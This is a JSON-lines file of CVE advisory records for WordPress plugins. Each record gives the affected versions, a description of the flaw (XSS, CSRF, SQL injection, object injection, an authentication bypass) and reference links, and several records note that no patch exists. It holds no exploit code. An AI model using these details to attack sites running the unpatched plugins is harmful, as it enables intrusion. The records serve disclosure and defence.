{"CVE_ID":"CVE-2024-1506","slug":"bdthemes-prime-slider-lite","versionImpact":"3.13.1","description":"The Prime Slider \u2013 Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title_tags' attribute of the Fiestar widget in all versions up to, and including, 3.13.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbb3ee94-e631-47ee-9f16-6bf7c23abab1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbb3ee94-e631-47ee-9f16-6bf7c23abab1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3044299\\\/bdthemes-prime-slider-lite\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3044299\\\/bdthemes-prime-slider-lite\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4535","slug":"kkprogressbar","versionImpact":"1.1.4.2","description":"The KKProgressbar2 Free  WordPress plugin through 1.1.4.2 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4980886-da10-4bbc-a84a-fe071ab3b755\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4980886-da10-4bbc-a84a-fe071ab3b755\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2254","slug":"rt-easy-builder-advanced-addons-for-elementor","versionImpact":"2.2","description":"The RT Easy Builder \u2013 Advanced addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5fb289e-bd38-42ea-86a4-7816b59bd0b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5fb289e-bd38-42ea-86a4-7816b59bd0b2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rt-easy-builder-advanced-addons-for-elementor\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/pricing-table\\\/template.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rt-easy-builder-advanced-addons-for-elementor\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/pricing-table\\\/template.php#L19\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0316","slug":"wp-directorybox-manager","versionImpact":"2.5","description":"The WP Directorybox Manager plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.5. This is due to incorrect authentication in the 'wp_dp_enquiry_agent_contact_form_submit_callback' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/directory-multipurpose-wordpress-theme\\\/10480929\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/directory-multipurpose-wordpress-theme\\\/10480929\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ee1f412-7555-4dec-ba59-49412471a42f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ee1f412-7555-4dec-ba59-49412471a42f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13899","slug":"mambo-joomla-importer","versionImpact":"1.0","description":"The Mambo Importer plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0 via deserialization of untrusted input via the $data parameter in the fImportMenu function. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mambo-joomla-importer\\\/trunk\\\/mamboImporter.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mambo-joomla-importer\\\/trunk\\\/mamboImporter.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6d448c2-5acc-47f8-8e86-9ef10fa01513?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6d448c2-5acc-47f8-8e86-9ef10fa01513?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2935","slug":"stop-spammer-registrations-plugin","versionImpact":"2024.7","description":"The Anti-Spam: Spam Protection | Block Spam Users, Comments, Forms plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2024.7. This is due to missing or incorrect nonce validation in the 'ss_option_maint.php' and 'ss_user_filter_list' files. This makes it possible for unauthenticated attackers to delete pending comments, and re-enable a previously blocked user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stop-spammer-registrations-plugin\\\/trunk\\\/settings\\\/ss_option_maint.php#L73\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stop-spammer-registrations-plugin\\\/trunk\\\/settings\\\/ss_option_maint.php#L73\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stop-spammer-registrations-plugin\\\/trunk\\\/settings\\\/ss_user_filter_list.php#L239\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stop-spammer-registrations-plugin\\\/trunk\\\/settings\\\/ss_user_filter_list.php#L239\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stop-spammer-registrations-plugin\\\/trunk\\\/settings\\\/ss_user_filter_list.php#L447\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stop-spammer-registrations-plugin\\\/trunk\\\/settings\\\/ss_user_filter_list.php#L447\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aefb192a-ed42-44a9-bbd1-5906909a419c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aefb192a-ed42-44a9-bbd1-5906909a419c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4622","slug":"baw-login-logout-menu","versionImpact":"1.3.3","description":"The Login Logout Menu WordPress plugin through 1.3.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea055ed4-324d-4d77-826a-b6f814413eb2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea055ed4-324d-4d77-826a-b6f814413eb2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4368","slug":"nmedia-user-file-uploader","versionImpact":"18.2","description":"The Frontend File Manager plugin for WordPress is vulnerable to Authenticated Settings Change in versions up to, and including, 18.2. This is due to lacking capability checks and a security nonce, all on the wpfm_save_settings AJAX action. This makes it possible for subscriber-level attackers to edit the plugin settings, such as the allowed upload file types.  This can lead to remote code execution through other vulnerabilities.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adb1d8b0-b1d6-40df-b591-f1062ee744fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adb1d8b0-b1d6-40df-b591-f1062ee744fb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1419","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.4.0","description":"The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018_id\u2019 attribute of the Header Meta Content widget in all versions up to, and including, 5.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0b3d83b-9695-40c5-b6ee-2a76c940de6e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0b3d83b-9695-40c5-b6ee-2a76c940de6e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3043999\\\/the-plus-addons-for-elementor-page-builder\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3043999\\\/the-plus-addons-for-elementor-page-builder\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4534","slug":"kkprogressbar","versionImpact":"1.1.4.2","description":"The KKProgressbar2 Free  WordPress plugin through 1.1.4.2 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7b0046d4-cf95-4307-95a5-9b823f2daaaa\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7b0046d4-cf95-4307-95a5-9b823f2daaaa\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8713","slug":"kodex-posts-likes","versionImpact":"2.5.0","description":"The Kodex Posts likes plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.5.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44780988-cadf-4ff2-9ba9-148b7b6650df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44780988-cadf-4ff2-9ba9-148b7b6650df?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kodex-posts-likes\\\/trunk\\\/admin\\\/partials\\\/settings.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kodex-posts-likes\\\/trunk\\\/admin\\\/partials\\\/settings.php#L14\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11451","slug":"zooom","versionImpact":"1.1.0","description":"The Zooom plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'zooom' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zooom\\\/trunk\\\/zooom.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zooom\\\/trunk\\\/zooom.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zooom\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zooom\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bd15878-a290-4613-83d9-011d60bb0233?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bd15878-a290-4613-83d9-011d60bb0233?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-55998","slug":"popup-surveys","versionImpact":"1.36","description":"Missing Authorization vulnerability in dusthazard Popup Surveys & Polls for WordPress (Mare.io) allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Popup Surveys & Polls for WordPress (Mare.io): from n\/a through 1.36.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/popup-surveys\\\/vulnerability\\\/wordpress-popup-surveys-polls-for-wordpress-mare-io-plugin-1-36-settings-change-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/popup-surveys\\\/vulnerability\\\/wordpress-popup-surveys-polls-for-wordpress-mare-io-plugin-1-36-settings-change-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13850","slug":"simple-add-pages-or-posts","versionImpact":"2.0.0","description":"The Simple add pages or posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-add-pages-or-posts\\\/tags\\\/2.0.0\\\/form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-add-pages-or-posts\\\/tags\\\/2.0.0\\\/form.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-add-pages-or-posts\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-add-pages-or-posts\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65a3604d-eb6b-484f-834a-b3d75fe3bda7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65a3604d-eb6b-484f-834a-b3d75fe3bda7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1382","slug":"contact-us-by-lord-linus","versionImpact":"2.6","description":"The Contact Us By Lord Linus WordPress plugin through 2.6 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a3002265-ac83-4c00-8afb-cbfbb4afc1e9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a3002265-ac83-4c00-8afb-cbfbb4afc1e9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31616","slug":"varnish-wp","versionImpact":"1.7","description":"Cross-Site Request Forgery (CSRF) vulnerability in AdminGeekZ Varnish WordPress allows Cross Site Request Forgery. This issue affects Varnish WordPress: from n\/a through 1.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/varnish-wp\\\/vulnerability\\\/wordpress-varnish-wordpress-plugin-1-7-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/varnish-wp\\\/vulnerability\\\/wordpress-varnish-wordpress-plugin-1-7-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4386","slug":"intuitive-custom-post-order","versionImpact":"3.1.3","description":"The Intuitive Custom Post Order WordPress plugin through 3.1.3 lacks CSRF protection in its update-menu-order ajax action, allowing an attacker to trick any user to change the menu order via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/734064e3-afe9-4dfd-8d76-8a757cc94815\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/734064e3-afe9-4dfd-8d76-8a757cc94815\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4367","slug":"flo-forms","versionImpact":"1.0.35","description":"The Flo Forms \u2013 Easy Drag & Drop Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Options Change by using the flo_import_forms_options AJAX action in versions up to, and including, 1.0.35 due to insufficient input sanitization and output escaping along with missing capability checks. This makes it possible for authenticated attackers, like subscribers, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4a83501-c727-4c9b-a9a1-46b399ab0caa\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4a83501-c727-4c9b-a9a1-46b399ab0caa\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a175e103-ab89-404b-8736-94d0d93d6cf3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a175e103-ab89-404b-8736-94d0d93d6cf3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/zero-day-vulnerability-fixed-in-wordpress-flo-forms-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/zero-day-vulnerability-fixed-in-wordpress-flo-forms-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4405","slug":"elasticpress","versionImpact":"3.5.3","description":"The ElasticPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.5.3. This is due to missing or incorrect nonce validation on the epio_send_autosuggest_allowed() function. This makes it possible for unauthenticated attackers to send allowed parameters for autosuggest to elasticpress[.]io via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473455\\\/elasticpress\\\/trunk\\\/includes\\\/classes\\\/Feature\\\/Autosuggest\\\/Autosuggest.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473455\\\/elasticpress\\\/trunk\\\/includes\\\/classes\\\/Feature\\\/Autosuggest\\\/Autosuggest.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ab8eb9d-1427-4e99-8986-179147e0862e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ab8eb9d-1427-4e99-8986-179147e0862e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1720","slug":"user-registration","versionImpact":"3.1.4","description":"The User Registration \u2013 Custom Registration Form, Login Form, and User Profile WordPress Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Display Name' parameter in all versions up to, and including, 3.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability requires social engineering to successfully exploit, and the impact would be very limited due to the attacker requiring a user to login as the user with the injected payload for execution.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62b809dc-4089-4822-8aeb-7049fcfe376e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62b809dc-4089-4822-8aeb-7049fcfe376e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-shortcodes.php#L288\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-shortcodes.php#L288\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045419\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045419\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-shortcodes.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-28850","slug":"wp-crontrol","description":"WP Crontrol controls the cron events on WordPress websites.  WP Crontrol includes a feature that allows administrative users to create events in the WP-Cron system that store and execute PHP code subject to the restrictive security permissions documented here. While there is no known vulnerability in this feature on its own, there exists potential for this feature to be vulnerable to RCE if it were specifically targeted via vulnerability chaining that exploited a separate SQLi (or similar) vulnerability. This is exploitable on a site if one of the below preconditions are met, the site is vulnerable to a writeable SQLi vulnerability in any plugin, theme, or WordPress core, the site's database is compromised at the hosting level, the site is vulnerable to a method of updating arbitrary options in the wp_options table, or the site is vulnerable to a method of triggering an arbitrary action, filter, or function with control of the parameters.  As a hardening measure, WP Crontrol version 1.16.2 ships with a new feature that prevents tampering of the code stored in a PHP cron event.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/johnbillion\\\/wp-crontrol\\\/security\\\/advisories\\\/GHSA-9xvf-cjvf-ff5q\",\"name\":\"https:\\\/\\\/github.com\\\/johnbillion\\\/wp-crontrol\\\/security\\\/advisories\\\/GHSA-9xvf-cjvf-ff5q\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/johnbillion\\\/wp-crontrol\\\/releases\\\/tag\\\/1.16.2\",\"name\":\"https:\\\/\\\/github.com\\\/johnbillion\\\/wp-crontrol\\\/releases\\\/tag\\\/1.16.2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4533","slug":"kkprogressbar","versionImpact":"1.1.4.2","description":"The KKProgressbar2 Free  WordPress plugin through 1.1.4.2 does not sanitize and escape a parameter before using it in a SQL statement, allowing admin users to perform SQL injection attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3406236-aaee-480a-8931-79c867252f11\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3406236-aaee-480a-8931-79c867252f11\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54391","slug":"wordpress-filter","versionImpact":"1.4.1","description":"Cross-Site Request Forgery (CSRF) vulnerability in Matt Walters WordPress Filter allows Stored XSS.This issue affects WordPress Filter: from n\/a through 1.4.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-filter\\\/vulnerability\\\/wordpress-wordpress-filter-plugin-1-4-1-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-filter\\\/vulnerability\\\/wordpress-wordpress-filter-plugin-1-4-1-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
